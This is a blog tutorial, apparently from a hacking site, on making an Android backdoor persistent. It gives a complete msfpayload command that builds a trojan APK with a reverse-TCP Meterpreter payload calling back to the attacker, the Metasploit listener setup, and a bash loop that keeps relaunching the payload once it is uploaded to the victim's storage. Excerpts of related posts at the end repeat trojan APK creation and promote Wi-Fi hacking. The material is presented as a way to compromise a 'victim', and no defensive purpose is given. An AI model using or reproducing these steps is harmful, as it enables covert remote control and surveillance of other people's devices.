How To Create A Persistent BackDoor In Android Using Kali Linux

-





How to make the Backdoor Persistent:


In this tutorial I am going to show you how to make the back door we created in my guide here a persistent one.
I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1 

Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN
  • Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
  • Now, lets set-up a Listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit
     
     
    After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

     

    Step 2

     Create a Persistent Script:

    Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)
    --------------------------------------------------------------------------------------------------------
    #!/bin/bash
    while true
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done
    --------------------------------------------------------------------------------------------------------
    (Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
    (The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
    (You can set the sleep to any amount of seconds you want the script to sleep)
       
     
    Move/Copy this to the Home/Root folder of KALI.
    --------------------------------------------------------------------------------------------------------
    Updated Script v3 (Compatible with any android version)
    CRITICAL:  
    DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
    ..I guess, you will have to write it on your own.. (Don't ask me why..)
    Code:
    --------------------------------------------------------------------------------------------------------
    #!/bin/bash
    while :
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done
    --------------------------------------------------------------------------------------------------------
    There is a 'space' between 'while' and ':'
    NO Multiple spaces in the script.
    NO Line Break between 3rd and 4th line. (So a total of 5 lines)

    Step 3Upload It to the Hacked Android System:

    You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
    To do this, navigate to the directory using the following commands:
    • cd /
    Now you should be in the ROOT directory, you can check by typing:
    • ls
    Now type:
    • cd etc
    Check again by typing:
    • ls
    Again change directory:
    • cd init.d
    • ls
    Here we are...

    Time to Upload the Shell Script:

    Do this by typing:
    • upload anything.sh
    What the? No! We need Root Access to complete this command! Darn!

    Never-Mind:

    > Lets just make the application (i.e. Main Activity) persistent until Reboot
    > However, it will not be persistent after the android system on the Victim goes for a Reboot.
    > To do this upload the script anywhere in the sdcard:
    • cd /
    • cd /sdcard/Download
    • ls
    • upload anything.sh
    Done! Uploaded!

    Step 4 

    Execute the Script:

    Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
    Drop into the system's shell by typing:
    • shell
    Now, navigate to the location of the script:
    • cd /
    • cd /sdcard/Download
    • ls
    Now its time for EXECUTION. Type:
    • sh anything.sh
     
    The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
    Reboot to eliminate the script or use Task Killer

    Step 5

     Testing...

    You can test it by exiting from meterpreter and again setting up a Listener.
    You should get a meterpreter prompt automatically!
    PROOF:
    Wow! It happened so Fast that 3 sessions got opened one after another.
    (I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

    The END:

    Yes! Finally a persistent backdoor has been created successfully for Android systems.

    Things to Remember:

    • The persistence of the backdoor will only remain until a reboot of the android system.
    • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
    • Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
    • If the Victim's Android system is Rooted and your Public IP is Static, then:
    1)The Persistence will remain forever on WAN!
    2)The Persistence will remain forever on LAN Obviously

    Comments

    Post a Comment

    Popular posts from this blog

    Best Wireless Adapters For Hacking Wireless Networks

    -
    Image
    To hack a Wi-Fi network using Kali Linux, you need your wireless card to support monitor mode and packet injection. Not all wireless cards can do this, so I've rounded up this list of 2017's best wireless network adapters for hacking on Kali Linux to get you started hacking both WEP and WPA Wi-Fi networks. Wi-Fi Hacking for Beginners Kali Linux is by far the best supported hacking distro for beginners, and Wi-Fi hacking on Kali (previously called BackTrack) is where I started my own journey into hacking. In order to hack Wi-Fi, you will quickly learn that a wireless network adapter supporting packet injection and monitor mode is essential. Without one, many attacks are impossible, and the few that work can take days to succeed. Fortunately, there are several good adapters to choose from.     If you're new to hacking Wi-Fi.Any of the wireless network adapters on this list can be combined with a Raspberry Pi to build your own Wi-Fi hacking computer.  
    Read more

    How To Hack Android With Kali Linux

    -
    Image
      Step 1   Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Note: Replace msfpayload with msfvenom...... Step 2   Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3   Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the pub
    Read more